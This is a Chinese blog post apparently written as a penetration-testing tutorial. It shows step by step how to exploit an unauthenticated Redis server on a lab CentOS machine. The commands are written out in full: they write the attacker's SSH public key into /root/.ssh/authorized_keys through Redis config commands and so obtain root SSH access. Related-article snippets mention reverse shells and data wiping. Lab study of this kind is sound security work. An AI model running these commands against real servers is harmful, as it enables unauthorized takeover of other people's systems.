redis未授权访问利用

最新推荐文章于 2021-01-18 14:42:18 发布
最新推荐文章于 2021-01-18 14:42:18 发布
阅读量332 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q1694222672/article/details/104843502
版权

文章目录

准备环境

靶机一台:centos7,172.16.12.2
开redis服务,6379

本机,有redis-cli客户端

连接测试

redis-cli -h 172.16.12.2

在这里插入图片描述
在这里插入图片描述

利用方式:写入本地公钥

生成本地公钥

ssh-keygen -t rsa

在这里插入图片描述

写入公钥到redis

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

cat /tmp/foo.txt |  /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

在这里插入图片描述

连接redis写入靶机

redis-cli -h 172.16.12.2
keys *
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save 
exit

在这里插入图片描述

连接靶机

因为设置了phase,所以输入123456
在这里插入图片描述

StarLord007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问利用
weixin_45682070的博客
06-09 351
Redis Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 本地漏洞环境搭建 本地环境kali是自身连接自身(不想开两个虚拟机了) wget http://download.redis.io/releases/redis-3.2.0.tar.gz
redis授权访问
ce666666的博客
02-04 1815
前言 不经历风雨,怎能看到彩虹 了解 redis是一个开源的、使用C语言编写的、支持网络交互的、可基于内存也可持久化的Key-Value数据库。 以MemcacheDB、Tokyo Tyrant为代表的key-value分布式存储,在上万并发连接下,轻松地完成高速查询。而MySQL,在几百个并发连接下,就基本上崩溃了。 安装 > wget http://download.redis.io/releases/redis-6.0.8.tar.gz tar xzf redis-6.0.8.tar.gz
redis授权访问漏洞
weixin_42140534的博客
01-18 931
0X01 漏洞介绍 redis 默认情况下,会绑定再 0.0.0.0:6379, 如果没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源的ip访问,这样会将redis的服务暴漏在公网上,如果在没有设置密码认证的情况下,会导致任意用户可以访问目标服务器的情况下授权访问redis以及读取redis数据。攻击者在授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_
Redis授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1542
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
linux echo命令的-n、-e两个参数
热门推荐
水滴石穿
02-25 1万+
echo -n 不换行输出 $echo -n "123" $echo "456" 最终输出 123456 而不是123456 echo -e 处理特殊字符若字符串中出现以下字符,则特别加以处理,而不会将它当成一般文字输出: \a 发出警告声; \b 删除前一个字符; \c 最后不加上换行符号; \f 换行但光标仍旧停留在原来的位置; \n 换行且光标移至行首; \r 光标移
redis故障记录
weixin_30898109的博客
12-16 172
最近线上的redis出现无法访问的现象,redis-cli能进入,但是任何命令都提示需要密码验证,以前一直都没有设置密码的,重启redis后正常,没过多久又出现了这个问题。 在此记录下解决方法。 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 授权访问的问题是...
授权访问漏洞的检测与利用
Yanug
05-07 2935
一、redis授权访问漏洞 漏洞描述 redis安装完以后,默认是没有账号密码的(安装redis详细可参考:redis相关笔记,如果redis是以root权限去运行,则可以被反弹shell或者写入ssh密钥,从而被获取服务器的权限。 漏洞检测 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) ...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4330
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
渗透学习入门学习之环境搭建,web入门
STAR_LORD
11-21 4479
1、搭建渗透测试学习环境 2003r2最好,win7也行2、各种网站解析环境搭建 Asp解析环境搭建 小旋风 Php解析环境搭建 phpstudy aspx解析环境搭建 jsp解析环境搭建 jspstudy3、常规渗透环境网络环境解析 1.操作系统选择 Windows2003 2008 Linux red hat FreeBSD Ubuntu等2.网站源码脚本格式 Asp php
SQL注入篇--MySQL数据库 手工注入
STAR_LORD
08-01 3074
MySQL数据库 主流数据库之一 功能完善,强大 手工注入 1、判断注入点
GITHUB信息泄露搜集工具GSIL修改版
STAR_LORD
01-10 2820
文章目录项目地址(欢迎Star、Fork)原项目地址修改后的地址关于GSIL-PRO关于开源项目GSIL修改内容使用方式原项目GSIL代码分析,方便快速定位功能点参数配置:限制关于源码,有兴趣的可以改成自己想要的样子 项目地址(欢迎Star、Fork) 原项目地址 GSIL 修改后的地址 GSIL_PRO 关于GSIL-PRO 该项目修改自开源项目GSIL,初衷是为了方便自己的使用,并做了一些...
渗透入门学习之http数据包
STAR_LORD
11-25 2324
为什么可以截断数据包? http是一种无状态数据,对数据包拦截不影响它的状态 HTTP修改数据包作用: - 漏洞测试 * 目录遍历 * 注入 * 绕过授权 * xss跨站 * 弱口令爆破 * 上
SQL注入篇--Access数据库 手工(联合查询,逐字猜解)加工具注入(sqlmap)
STAR_LORD
07-27 1492
Access数据库 正式名称 Microsoft_Access 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 1.判断注入点 这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:47744/new_list.asp?id=1 判断注入点标准三连 ’ ~ and 1=1 ~ and 1=2 ...
ASP外观专利图像检索平台(源代码+论文).rar
07-21
ASP外观专利图像检索平台(源代码+论文)
C++课程设计:电煤气管理系统【源码+文档】
最新发布
07-21
C++课程设计:电煤气管理系统【源码+文档】 本程序是一个水电气管理信息系统,能够对高校的水电气费用进行管理, 包括了成员的基本信息,如学号、编号、姓名、成员水电气的用量等。程序的用途包括缴纳水电气费、查询一个同学水电气费用量、查看所有同学的缴费情况、增加学生信息、删除学生信息、退出系统等。在设计时也考虑到学生和教师在用水电气时的不同,学生可以免费使用一定额度的水电气,超过这个额度的以后必须付费,且付费部分水电气费的价格要高于教工的收费标准,该措施的实行是为了鼓励同学们节约资源,以免造成不必要的资源浪费。该软件主要是为了学校的管理人员提供便捷,以更快的完成水电气费用的收缴。该软件本着简洁明了,实用稳定为一体进行设计。 系统将实现以下功能: (1)实现对用户信息的录入; (2)实现水电煤气数据的录入; (3)实现计算并查询用户应缴费用,查询缴纳费用的名单; (4)实现对人员的删除和添加;
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值